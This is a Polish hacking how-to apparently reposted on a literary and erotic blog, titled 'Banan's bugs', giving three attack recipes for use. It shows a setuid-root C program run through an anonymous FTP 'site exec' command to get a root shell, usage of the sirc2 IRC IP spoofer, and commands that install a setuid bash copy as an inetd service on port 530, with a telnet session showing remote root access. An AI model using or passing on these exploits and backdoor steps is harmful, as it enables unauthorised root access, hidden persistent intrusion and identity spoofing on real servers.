Blog literacki, portal erotyczny - seks i humor nie z tej ziemi


------------------------------------------------------------------------------
XX Banan's bugs :)

1 Jak zdobyc roota za pomoca ftp : BANAN
2 Sirc2, czyli irc-owy spoofer : BANAN
3 Tylne drzwi na port 530 : BANAN
------------------------------------------------------------------------------
Eeech, wiem, wiem, nie mam czasu :)


1. Jak zdobyc roota, za pomoca ftp : BANAN

Najpierw skompiluj ponizszy exploit i nazwij go suidroot.c
Kompilacja gcc suidroot.c -o suidroot

main() {
setuid(0);
seteuid(0);
system("cp /bin/sh /tmp/suidroot");
system("chmod a+rwxs /tmp/suidroot");
}

Teraz stworz skrypt o nazwie root.sh:

-- CUT HERE --
#!/bin/sh
exec suidroot
-- CUT HERE --

Teraz ftp, login anonymous, password twoj login@host.com i piszesz

ftp> quote site exec sh root.sh

Teraz wyjdz z ftp i uruchom plik /tmp/suidroot a bedziesz mial roota!!!


2.Sirc2, czyli irc-owy spoofer : BANAN

Programy o nazwach od sirc2 do sirc4, sa to spoofery za pomoca ktorych
mozesz zmienic swoje ip. Pozwala to na zrobienie paru fajnych rzeczy na
ircu i nie tylko. Ja podam i opisze sirc2, oraz krotko przedstawie jego
funkcje. Spoofer jest dostepny na www p0werfaq. Oto jak go uzyc:

sirc2 1.1.1.1 unseen.org 6667 -i Warlock warlock@lame.com "Doktor Killer"

Male wyjasnienie co jest co:

1.1.1.1 - twoje ip :)
unseen.org - serwer irc
6667 - port serwa irc
Warlock - pod jakim nickiem bedziesz na irc
warlock@... - uzytkownik i host pod jakim bedziesz na irc (host musi istniec
w bazach DNS).
"Doktor..." - Informacja jakie jest twoje prawdziwe imie.


3. Tylne drzwi na port 530 : BANAN

Oto jak sobie zainstalowac prosty backdoor na serwerku. Eech, to raczej
powinno byc w czesci o backdoorach :) Opisane dla linucha, w niektorych
UNIXach demony "mieszkaja" w innym katalogu niz /usr/sbin :) Acha, root sie
przydaje wbrew pozorom :)

% cp /bin/bash /usr/sbin/in.courierd
% chmod 4755 /usr/sbin/in.courierd
% echo "courier stream tcp nowait root /usr/sbin/in.courierd" >>/etc/inetd.conf
% killall -HUP inetd

Tia, a pozniej (wszystkie polecenia koncz znakiem ;)...

% telnet serwer.com 530
Trying 194.204.123.22...

bash# whoami;
root

I to juz koniec :)
  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • qualintaka.pev.pl
    •